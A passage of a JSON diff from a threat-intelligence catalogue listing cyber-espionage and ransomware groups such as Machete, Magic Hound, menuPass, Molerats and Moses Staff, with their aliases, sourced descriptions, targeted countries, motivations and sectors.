+ "uuid": "b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a", + "value": "LuminousMoth" + }, + { + "description": "[[360 Machete Sep 2020](https://app.tidalcyber.com/references/682c843d-1bb8-4f30-9d2e-35e8d41b1976)]", + "meta": { + "id": "2ad95cd1-e04c-4bad-877c-c96c5424cd7e" + }, + "related": [ + { + "dest-uuid": "a3be79a2-3d4f-4697-a8a1-83f0884220af", + "type": "similar" + } + ], + "uuid": "4656c093-80f5-4f33-a695-09180101d3d9", + "value": "APT-C-43" + }, + { + "description": "[[Cylance Machete Mar 2017](https://app.tidalcyber.com/references/92a9a311-1e0b-4819-9856-2dfc8dbfc08d)]", + "meta": { + "id": "4ab530f5-0f57-47da-8e9b-c887220ed1ac" + }, + "related": [ + { + "dest-uuid": "a3be79a2-3d4f-4697-a8a1-83f0884220af", + "type": "similar" + } + ], + "uuid": "b5f7c7c6-f079-4e6e-95a5-4fde667b9705", + "value": "El Machete" + }, + { + "description": "[Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.[[Cylance Machete Mar 2017](https://app.tidalcyber.com/references/92a9a311-1e0b-4819-9856-2dfc8dbfc08d)][[Securelist Machete Aug 2014](https://app.tidalcyber.com/references/fc7be240-bd15-4ec4-bc01-f8891d7210d9)][[ESET Machete July 2019](https://app.tidalcyber.com/references/408d5e33-fcb6-4d21-8be9-7aa5a8bd3385)][[360 Machete Sep 2020](https://app.tidalcyber.com/references/682c843d-1bb8-4f30-9d2e-35e8d41b1976)]", + "meta": { + "group_attack_id": "G0095", + "observed_countries": [ + "AR", + "BE", + "BO", + "BR", + "CA", + "CN", + "CO", + "CU", + "DO", + "EC", + "FR", + "DE", + "GT", + "MY", + "MX", + "NI", + "PE", + "RU", + "ES", + "SE", + "UA", + "GB", + "US", + "VE" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government", + "Telecommunications", + "Utilities" + ] + }, + "related": [ + { + "dest-uuid": "827c17e0-c3f5-4ad1-a4f4-30a40ed0a2d3", + "type": "similar" + }, + { + "dest-uuid": "4656c093-80f5-4f33-a695-09180101d3d9", + "type": "similar" + }, + { + "dest-uuid": "b5f7c7c6-f079-4e6e-95a5-4fde667b9705", + "type": "similar" + } + ], + "uuid": "a3be79a2-3d4f-4697-a8a1-83f0884220af", + "value": "Machete" + }, + { + "description": "[[Microsoft Phosphorus Mar 2019](https://app.tidalcyber.com/references/c55a112d-4b05-4c32-a5b3-480b12929115)][[Microsoft Phosphorus Oct 2020](https://app.tidalcyber.com/references/8986c21c-16a0-4a53-8e37-9935bbbfaa4b)][[US District Court of DC Phosphorus Complaint 2019](https://app.tidalcyber.com/references/8f73a709-fb7e-4d9e-9743-4ba39ea26ea8)][[Certfa Charming Kitten January 2021](https://app.tidalcyber.com/references/c38a8af6-3f9b-40c3-8122-a2a51eb50664)][[Proofpoint TA453 March 2021](https://app.tidalcyber.com/references/5ba4217c-813b-4cc5-b694-3a4dcad776e4)][[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]", + "meta": { + "id": "d6773afc-0476-408e-957a-ba7b97b41c58" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "similar" + } + ], + "uuid": "618f578f-a73b-4f47-b123-8c3877325675", + "value": "Phosphorus" + }, + { + "description": "[[Proofpoint TA453 March 2021](https://app.tidalcyber.com/references/5ba4217c-813b-4cc5-b694-3a4dcad776e4)][[Proofpoint TA453 July2021](https://app.tidalcyber.com/references/a987872f-2176-437c-a38f-58676b7b12de)][[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]", + "meta": { + "id": "d939cf61-8fab-4172-9244-8c5f5b43f17d" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "similar" + } + ], + "uuid": "69d9316e-daa7-4fe4-86e0-c79c4ab27c5e", + "value": "TA453" + }, + { + "description": "[[ClearSky Charming Kitten Dec 2017](https://app.tidalcyber.com/references/23ab1ad2-e9d4-416a-926f-6220a59044ab)][[Eweek Newscaster and Charming Kitten May 2014](https://app.tidalcyber.com/references/a3407cd2-d579-4d64-8f2e-162c31a99534)][[ClearSky Kittens Back 2 Oct 2019](https://app.tidalcyber.com/references/f5114978-2528-4199-a586-0158c5f8a138)][[ClearSky Kittens Back 3 August 2020](https://app.tidalcyber.com/references/a10c6a53-79bb-4454-b444-cfb9136ecd36)][[Proofpoint TA453 March 2021](https://app.tidalcyber.com/references/5ba4217c-813b-4cc5-b694-3a4dcad776e4)][[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]", + "meta": { + "id": "4610784d-876d-46e5-ac9c-d8c40456706b" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "similar" + } + ], + "uuid": "2a379f9c-0c8b-4066-8131-dfc6aad03b30", + "value": "Charming Kitten" + }, + { + "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).[[Unit 42 Magic Hound Feb 2017](https://app.tidalcyber.com/references/f1ef9868-3ddb-4289-aa92-481c35517920)][[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)]", + "meta": { + "id": "70db62b8-2214-4532-9880-4d8c7aabcdd4" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "similar" + } + ], + "uuid": "1701d47b-d0ad-47dd-965e-0f50737c34ef", + "value": "Newscaster" + }, + { + "description": "[[Secureworks COBALT ILLUSION Threat Profile](https://app.tidalcyber.com/references/8d9a5b77-2516-4ad5-9710-4c8165df2882)]", + "meta": { + "id": "1b2d8360-2a44-4d81-bd85-a2d6d3881254" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "similar" + } + ], + "uuid": "9a6d6b98-17f3-445d-94dc-fb6e942245c3", + "value": "COBALT ILLUSION" + }, + { + "description": "[[IBM ITG18 2020](https://app.tidalcyber.com/references/523b7a1e-88ef-4440-a7b3-3fd0b8d5e199)]", + "meta": { + "id": "f9671b18-8de3-430b-9531-99bfab0e1f72" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "similar" + } + ], + "uuid": "ae8cdb8b-d572-427b-93ad-195a3d41a08a", + "value": "ITG18" + }, + { + "description": "[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)][[Certfa Charming Kitten January 2021](https://app.tidalcyber.com/references/c38a8af6-3f9b-40c3-8122-a2a51eb50664)][[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]", + "meta": { + "id": "118c430f-24db-40e0-8a54-5015c59ea151" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "similar" + } + ], + "uuid": "b908442f-7e76-48d9-ba6f-448ce1e8b071", + "value": "APT35" + }, + { + "description": "[Magic Hound](https://app.tidalcyber.com/groups/7a9d653c-8812-4b96-81d1-b0a27ca918b4) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)][[ClearSky Kittens Back 3 August 2020](https://app.tidalcyber.com/references/a10c6a53-79bb-4454-b444-cfb9136ecd36)][[Certfa Charming Kitten January 2021](https://app.tidalcyber.com/references/c38a8af6-3f9b-40c3-8122-a2a51eb50664)][[Secureworks COBALT ILLUSION Threat Profile](https://app.tidalcyber.com/references/8d9a5b77-2516-4ad5-9710-4c8165df2882)][[Proofpoint TA453 July2021](https://app.tidalcyber.com/references/a987872f-2176-437c-a38f-58676b7b12de)]", + "meta": { + "country": "IR", + "group_attack_id": "G0059", + "observed_countries": [ + "AF", + "CA", + "EG", + "IR", + "IQ", + "IL", + "JO", + "KW", + "MA", + "PK", + "SA", + "ES", + "SY", + "TR", + "AE", + "GB", + "US", + "VE", + "YE" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Construction", + "Defense", + "Education", + "Energy", + "Entertainment", + "Government", + "Human Rights", + "Media", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "b8967b3c-3bc9-11e8-8701-8b1ead8c099e", + "type": "similar" + }, + { + "dest-uuid": "618f578f-a73b-4f47-b123-8c3877325675", + "type": "similar" + }, + { + "dest-uuid": "69d9316e-daa7-4fe4-86e0-c79c4ab27c5e", + "type": "similar" + }, + { + "dest-uuid": "2a379f9c-0c8b-4066-8131-dfc6aad03b30", + "type": "similar" + }, + { + "dest-uuid": "1701d47b-d0ad-47dd-965e-0f50737c34ef", + "type": "similar" + }, + { + "dest-uuid": "9a6d6b98-17f3-445d-94dc-fb6e942245c3", + "type": "similar" + }, + { + "dest-uuid": "ae8cdb8b-d572-427b-93ad-195a3d41a08a", + "type": "similar" + }, + { + "dest-uuid": "b908442f-7e76-48d9-ba6f-448ce1e8b071", + "type": "similar" + } + ], + "uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "value": "Magic Hound" + }, + { + "description": "MedusaLocker is a ransomware-as-a-service (\"RaaS\") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 has typically occurred via exploit of vulnerable Remote Desktop Protocol devices.[[HC3 Analyst Note MedusaLocker Ransomware February 2023](/references/49e314d6-5324-41e0-8bee-2b3e08d5e12f)]\n \nThis object represents behaviors associated with operators of MedusaLocker ransomware. As MedusaLocker is licensed on a RaaS model, affiliates likely do not act as a single cohesive unit, and behaviors observed during particular attacks may vary. Behaviors associated with samples of MedusaLocker ransomware are represented in the \"MedusaLocker Ransomware\" Software object.\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker", + "meta": { + "group_attack_id": "G5003", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Healthcare" + ] + }, + "related": [], + "uuid": "55b20209-c04a-47ab-805d-ace83522ef6a", + "value": "MedusaLocker Ransomware Actors" + }, + { + "description": "Medusa is a ransomware operation that reportedly launched in June 2021. In 2023, the group launched a website used to publicize alleged victims. The group appears to be independent of the similarly named \"MedusaLocker\" operation.[[Bleeping Computer Medusa Ransomware March 12 2023](/references/21fe1d9e-17f1-49e2-b05f-78e9160f5414)]\n\nAccording to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, Medusa actors publicly claimed around 90 victims through September 2023, ranking it ninth out of the 50+ ransomware operations in the dataset. These victims come from a wide variety of industry sectors and localities.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]", + "meta": { + "group_attack_id": "G5007", + "observed_countries": [ + "CA", + "CL", + "CY", + "CZ", + "FR", + "PF", + "IN", + "ID", + "KE", + "MX", + "MA", + "CH", + "TO", + "AE", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Aerospace", + "Automotive", + "Casinos Gambling", + "Education", + "Electronics", + "Energy", + "Financial Services", + "Healthcare", + "Hospitality Leisure", + "Insurance", + "Legal", + "Media", + "Pharmaceuticals", + "Retail", + "Telecommunications", + "Transportation" + ] + }, + "related": [], + "uuid": "316a49d5-5fe0-4e0b-a276-f955f4277162", + "value": "Medusa Ransomware Actors" + }, + { + "description": "[[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)][[Accenture Hogfish April 2018](https://app.tidalcyber.com/references/c8e9fee1-9981-499f-a62f-ffe59f4bb1e7)][[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)][[Symantec Cicada November 2020](https://app.tidalcyber.com/references/28a7bbd8-d664-4234-9311-2befe0238b5b)]", + "meta": { + "id": "c383f724-e2b5-4640-8666-5800c101664a" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "similar" + } + ], + "uuid": "54b7d2ff-e1e3-49f7-8cb5-a9089b9f9807", + "value": "Stone Panda" + }, + { + "description": "[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)][[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]", + "meta": { + "id": "0f8db655-40d1-4c0a-98d0-b84195a72934" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "similar" + } + ], + "uuid": "3eb5f80a-0069-4f3f-9c25-6139254b307c", + "value": "CVNX" + }, + { + "description": "[[Symantec Cicada November 2020](https://app.tidalcyber.com/references/28a7bbd8-d664-4234-9311-2befe0238b5b)]", + "meta": { + "id": "ce558501-8ee1-4825-b389-3bcf229c3379" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "similar" + } + ], + "uuid": "f7cac76e-8c1f-43ca-8769-9fb573fe6328", + "value": "Cicada" + }, + { + "description": "[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]", + "meta": { + "id": "742b6e73-305f-4556-849a-0985bfa780f2" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "similar" + } + ], + "uuid": "30f0cb4f-7bb5-4794-8843-bd925bafeb59", + "value": "POTASSIUM" + }, + { + "description": "[[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)][[Accenture Hogfish April 2018](https://app.tidalcyber.com/references/c8e9fee1-9981-499f-a62f-ffe59f4bb1e7)][[FireEye APT10 Sept 2018](https://app.tidalcyber.com/references/5f122a27-2137-4016-a482-d04106187594)][[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[Symantec Cicada November 2020](https://app.tidalcyber.com/references/28a7bbd8-d664-4234-9311-2befe0238b5b)]", + "meta": { + "id": "c687c273-9b3a-4225-8228-525794fcac77" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "similar" + } + ], + "uuid": "f18b971c-5d70-4884-8069-983324946274", + "value": "APT10" + }, + { + "description": "[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)][[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]", + "meta": { + "id": "4478e90a-a153-4092-9694-758921bb949b" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "similar" + } + ], + "uuid": "31fc92e8-3de5-47a2-a63e-37cb82fd8bdb", + "value": "Red Apollo" + }, + { + "description": "[[Accenture Hogfish April 2018](https://app.tidalcyber.com/references/c8e9fee1-9981-499f-a62f-ffe59f4bb1e7)]", + "meta": { + "id": "d41f86bc-0492-40ae-9234-0c38c720300a" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "similar" + } + ], + "uuid": "cdd6a361-e7b5-48a0-a866-96ccc79f9dda", + "value": "HOGFISH" + }, + { + "description": "[menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]\n\n[menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.[[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)][[Crowdstrike CrowdCast Oct 2013](https://app.tidalcyber.com/references/2062a229-58b3-4610-99cb-8907e7fbb350)][[FireEye Poison Ivy](https://app.tidalcyber.com/references/c189447e-a903-4dc2-a38b-1f4accc64e20)][[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)][[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)][[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)][[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]", + "meta": { + "country": "CN", + "group_attack_id": "G0045", + "observed_countries": [ + "AU", + "BE", + "BR", + "CA", + "CN", + "FI", + "FR", + "DE", + "HK", + "IN", + "IL", + "IT", + "JP", + "KR", + "ME", + "NL", + "NO", + "PH", + "SG", + "ZA", + "SE", + "CH", + "TW", + "TH", + "TR", + "AE", + "GB", + "US", + "VN" + ], + "observed_motivations": [ + "Cyber Espionage", + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Construction", + "Defense", + "Education", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "Manufacturing", + "Maritime", + "Mining", + "Pharmaceuticals", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "56b37b05-72e7-4a89-ba8a-61ce45269a8c", + "type": "similar" + }, + { + "dest-uuid": "54b7d2ff-e1e3-49f7-8cb5-a9089b9f9807", + "type": "similar" + }, + { + "dest-uuid": "3eb5f80a-0069-4f3f-9c25-6139254b307c", + "type": "similar" + }, + { + "dest-uuid": "f7cac76e-8c1f-43ca-8769-9fb573fe6328", + "type": "similar" + }, + { + "dest-uuid": "30f0cb4f-7bb5-4794-8843-bd925bafeb59", + "type": "similar" + }, + { + "dest-uuid": "f18b971c-5d70-4884-8069-983324946274", + "type": "similar" + }, + { + "dest-uuid": "31fc92e8-3de5-47a2-a63e-37cb82fd8bdb", + "type": "similar" + }, + { + "dest-uuid": "cdd6a361-e7b5-48a0-a866-96ccc79f9dda", + "type": "similar" + } + ], + "uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "value": "menuPass" + }, + { + "description": "[Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) is a suspected cyber espionage group that was first reported in September 2022. [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) based on the \"I am meta\" string in one of the group's malware samples and the expectation of Spanish-language responses from C2 servers.[[SentinelLabs Metador Sept 2022](https://app.tidalcyber.com/references/137474b7-638a-56d7-9ce2-ab906f207175)]", + "meta": { + "group_attack_id": "G1013", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [], + "uuid": "a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b", + "value": "Metador" + }, + { + "description": "[Moafee](https://app.tidalcyber.com/groups/4510ce41-27b9-479c-9bf3-a328b77bae29) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://app.tidalcyber.com/groups/f2c2db08-624c-46b9-b7ed-b22c21b81813). [[Haq 2014](https://app.tidalcyber.com/references/4e10228d-d9da-4ba4-bca7-d3bbdce42e0d)]", + "meta": { + "country": "CN", + "group_attack_id": "G0002", + "observed_countries": [ + "JP", + "TW", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government", + "Manufacturing" + ] + }, + "related": [ + { + "dest-uuid": "a9b44750-992c-4743-8922-129880d277ea", + "type": "similar" + } + ], + "uuid": "4510ce41-27b9-479c-9bf3-a328b77bae29", + "value": "Moafee" + }, + { + "description": "[Mofang](https://app.tidalcyber.com/groups/8bc69792-c26d-4493-87e3-d8e47605fed8) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.[[FOX-IT May 2016 Mofang](https://app.tidalcyber.com/references/f1a08b1c-f7d5-4a91-b3b7-0f042b297842)]", + "meta": { + "country": "CN", + "group_attack_id": "G0103", + "observed_countries": [ + "CA", + "DE", + "IN", + "KR", + "MM", + "SG", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Automotive", + "Defense", + "Government", + "Infrastructure" + ] + }, + "related": [], + "uuid": "8bc69792-c26d-4493-87e3-d8e47605fed8", + "value": "Mofang" + }, + { + "description": "[[FireEye Operation Molerats](https://app.tidalcyber.com/references/6b24e4aa-e773-4ca3-8267-19e036dc1144)][[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]", + "meta": { + "id": "346086f7-4510-43de-bb11-09b3679f2862" + }, + "related": [ + { + "dest-uuid": "679b7b6b-9659-4e56-9ffd-688a6fab01b6", + "type": "similar" + } + ], + "uuid": "d33e9c35-2176-44c8-8d5e-77ed5de472b2", + "value": "Operation Molerats" + }, + { + "description": "[[DustySky](https://app.tidalcyber.com/references/b9e0770d-f54a-4ada-abd1-65c45eee00fa)][[Kaspersky MoleRATs April 2019](https://app.tidalcyber.com/references/38216a34-5ffd-4e79-80b1-7270743b728e)][[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]", + "meta": { + "id": "ddbfe002-11d9-470f-89b3-1952ecfff3f9" + }, + "related": [ + { + "dest-uuid": "679b7b6b-9659-4e56-9ffd-688a6fab01b6", + "type": "similar" + } + ], + "uuid": "7399d632-1b1d-47da-8f8e-0f8decd62bf7", + "value": "Gaza Cybergang" + }, + { + "description": "[Molerats](https://app.tidalcyber.com/groups/679b7b6b-9659-4e56-9ffd-688a6fab01b6) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States.[[DustySky](https://app.tidalcyber.com/references/b9e0770d-f54a-4ada-abd1-65c45eee00fa)][[DustySky2](https://app.tidalcyber.com/references/4a3ecdec-254c-4eb4-9126-f540bb21dffe)][[Kaspersky MoleRATs April 2019](https://app.tidalcyber.com/references/38216a34-5ffd-4e79-80b1-7270743b728e)][[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]", + "meta": { + "group_attack_id": "G0021", + "observed_countries": [ + "EG", + "IQ", + "IL", + "PS", + "SA", + "TR", + "AE", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Banks", + "Government", + "Media", + "NGOs" + ] + }, + "related": [ + { + "dest-uuid": "f7c2e501-73b1-400f-a5d9-2e2e07b7dfde", + "type": "similar" + }, + { + "dest-uuid": "d33e9c35-2176-44c8-8d5e-77ed5de472b2", + "type": "similar" + }, + { + "dest-uuid": "7399d632-1b1d-47da-8f8e-0f8decd62bf7", + "type": "similar" + } + ], + "uuid": "679b7b6b-9659-4e56-9ffd-688a6fab01b6", + "value": "Molerats" + }, + { + "description": "[Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand.[[Checkpoint MosesStaff Nov 2021](https://app.tidalcyber.com/references/d6da2849-cff0-408a-9f09-81a33fc88a56)] \n\nSecurity researchers assess [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.[[Cybereason StrifeWater Feb 2022](https://app.tidalcyber.com/references/30c911b2-9a5e-4510-a78c-c65e84398c7e)]", + "meta": { + "country": "IR", + "group_attack_id": "G1009", + "observed_countries": [ + "CL", + "DE", + "IN", + "IL", + "IT", + "TR", + "AE", + "US" + ], + "observed_motivations": [ + "Cyber Espionage", + "Destruction" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Energy", + "Financial Services", + "Government", + "Manufacturing", + "Travel Services", + "Utilities" + ] + }, + "related": [], + "uuid": "a41725c5-eb3a-4772-8d1e-17c3bbade79c", + "value": "Moses Staff" + }, + { + "description": "[MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus.[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]", + "meta": { + "group_attack_id": "G1019", + "observed_countries": [ + "BY" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government" + ] + }, + "related": [], + "uuid": "f31df12e-66ea-5a49-87bc-2bc1756a89fc", + "value": "MoustachedBouncer" + }, + { + "description": "[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)][[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", + "meta": { + "id": "46251839-ff6e-430e-91e4-a8cb848c1127" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "similar" + } + ], + "uuid": "ac24e233-2250-477b-a4cb-6ae018d5836b", + "value": "Static Kitten" + }, + { + "description": "[[FireEye MuddyWater Mar 2018](https://app.tidalcyber.com/references/82cddfa6-9463-49bb-8bdc-0c7d6b0e1472)][[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)][[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", + "meta": { + "id": "f8f99bfa-5f93-4ddc-a72e-fc572a47719e" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "similar" + } + ], + "uuid": "b4215569-ec22-43ad-839a-67cd09030e2e", + "value": "TEMP.Zagros" + }, + { + "description": "[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]", + "meta": { + "id": "201ec12b-c81a-4473-8afa-a3d57f552f59" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "similar" + } + ], + "uuid": "d4cd493f-b88d-4687-b040-60be94e42a65", + "value": "MERCURY" 